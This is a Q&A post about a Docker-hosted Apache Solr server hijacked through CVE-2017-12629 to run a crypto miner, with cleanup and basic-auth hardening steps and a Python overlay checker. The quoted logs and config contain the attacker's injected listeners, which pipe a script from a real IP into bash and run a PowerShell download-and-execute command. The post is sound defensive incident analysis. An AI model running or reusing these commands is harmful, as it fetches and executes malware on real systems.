SolrException: Error loading class 'solr.RunEx

Published 2019-04-14 04:07

Question:

Prehistory:

  1. My friend's site started to work slowly.
  2. This site uses docker.
  3. htop told me that all cores were loaded at 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, 8983 indicates that the problem is in the Solr container.
  4. I tried to update Solr from v6.? to 7.4 and got the message:

    o.a.s.c.SolrCore Error while closing ... Caused by: org.apache.solr.common.SolrException: Error loading class 'solr.RunExecutableListener'

    Rolled back to v6.6.4 (the only v6 available on Docker Hub https://hub.docker.com/_/solr/) as the site should continue working.

  5. In the Docker logs I found:

    [x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{ "exe":"sh", "name":"newlistener-02", "args":[ -"c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}}]

  6. So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).

  7. Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find the full config, but right now we need just the listener section:

    "listener":[{ "event":"newSearcher", "class":"solr.QuerySenderListener", "queries":[]}, { "event":"firstSearcher", "class":"solr.QuerySenderListener", "queries":[]}, { "exe":"sh", "name":"newlistener-02", "args":["-c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}, { "exe":"sh", "name":"newlistener-25", "args":["-c", "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"/bin/"}, { "exe":"cmd.exe", "name":"newlistener-00", "args":["/c", "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"], "event":"newSearcher", "class":"solr.RunExecutableListener", "dir":"cmd.exe"}],

  8. As we do not have such settings in solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).

Answer 1:

Fixing:

  1. Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).

  2. Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.


As I understand, this attack is possible due to CVE-2017-12629:

  1. How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/

  2. CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc

... and has been fixed in v5.5.5, 6.6.2+, 7.1+

which was possible because http://example.com:8983 is freely available to anyone, so even though this exploit is fixed, let's...


  1. Add protection to http://example.com:8983

    Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin

    Create security.json with:

    { "authentication":{ "blockUnknown": true, "class":"solr.BasicAuthPlugin", "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="} }, "authorization":{ "class":"solr.RuleBasedAuthorizationPlugin", "permissions":[{"name":"security-edit", "role":"admin"}], "user-role":{"solr":"admin"} }}

    This file must be dropped at /opt/solr/server/solr/ (i.e. next to solr.xml).

    As Solr has its own hash checker (a sha256(password+salt) hash), a typical solution cannot be used here. The easiest way to generate the hash that I've found is to download the jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.

Because I use docker-compose, I simply build Solr like this:

# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container

  # Check if 'default' core is created. If not, then create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default

  # Access to web interface from host to container, i.e 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default  # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data  # indexes
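Two parts of the above that are easy to script, as an added example that is not part of the original question or answer: a check that reports every solr.RunExecutableListener entry found in a configoverlay.json (or in the /config and /config/overlay API bodies), and a Python re-implementation of the security.json password hash so the third-party jar is not needed. Assumptions: the overlay file keys listeners by name while the /config output shown above lists them as an array; the hash is base64(sha256(sha256(salt_bytes + utf8(password)))) in the "hash salt" format shown in the security.json above; the sample overlay is constructed, with the malicious host replaced by a placeholder.

```python
import base64
import hashlib
import hmac
import json
import os

# Constructed sample in the shape of the compromised configoverlay.json from the
# question (assumption: the file keys listeners by name). Hostile host replaced.
SAMPLE_OVERLAY = json.dumps({
    "listener": {
        "newlistener-02": {
            "exe": "sh", "dir": "/bin/", "event": "newSearcher",
            "class": "solr.RunExecutableListener",
            "args": ["-c", "curl -s http://ATTACKER_HOST_PLACEHOLDER/mr.sh | bash -sh"],
        }
    }
})


def find_run_executable_listeners(overlay_text):
    """Return (name, exe, args) for every solr.RunExecutableListener entry.

    Accepts the bare overlay file, the /config/overlay body ({"overlay": ...}) and
    the full /config body ({"config": ...}), whose "listener" is a list, not a map.
    """
    doc = json.loads(overlay_text)
    doc = doc.get("overlay", doc.get("config", doc))
    listeners = doc.get("listener", {})
    if isinstance(listeners, dict):  # overlay file: map keyed by listener name
        entries = [dict(cfg, name=cfg.get("name", name)) for name, cfg in listeners.items()]
    else:                            # /config output: array of listener objects
        entries = listeners
    return [(e.get("name"), e.get("exe"), e.get("args", []))
            for e in entries if e.get("class") == "solr.RunExecutableListener"]


def solr_password_hash(password, salt_b64=None):
    """Build the "hash salt" string BasicAuthPlugin stores in security.json.

    Assumed algorithm: base64(sha256(sha256(salt_bytes + utf8(password)))) followed
    by a space and the base64 salt. A fresh 32-byte salt is drawn when none is given.
    """
    salt = base64.b64decode(salt_b64) if salt_b64 else os.urandom(32)
    inner = hashlib.sha256(salt + password.encode("utf-8")).digest()
    outer = hashlib.sha256(inner).digest()
    return base64.b64encode(outer).decode() + " " + base64.b64encode(salt).decode()


def solr_password_verify(password, stored):
    """Check a password against a stored "hash salt" value in constant time."""
    _, salt_b64 = stored.split(" ", 1)
    return hmac.compare_digest(solr_password_hash(password, salt_b64), stored)
```

Run `find_run_executable_listeners` over the overlay file of each core after cleanup to confirm nothing was left behind, and paste the output of `solr_password_hash("your-password")` into the credentials map of security.json.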


Tags: security solr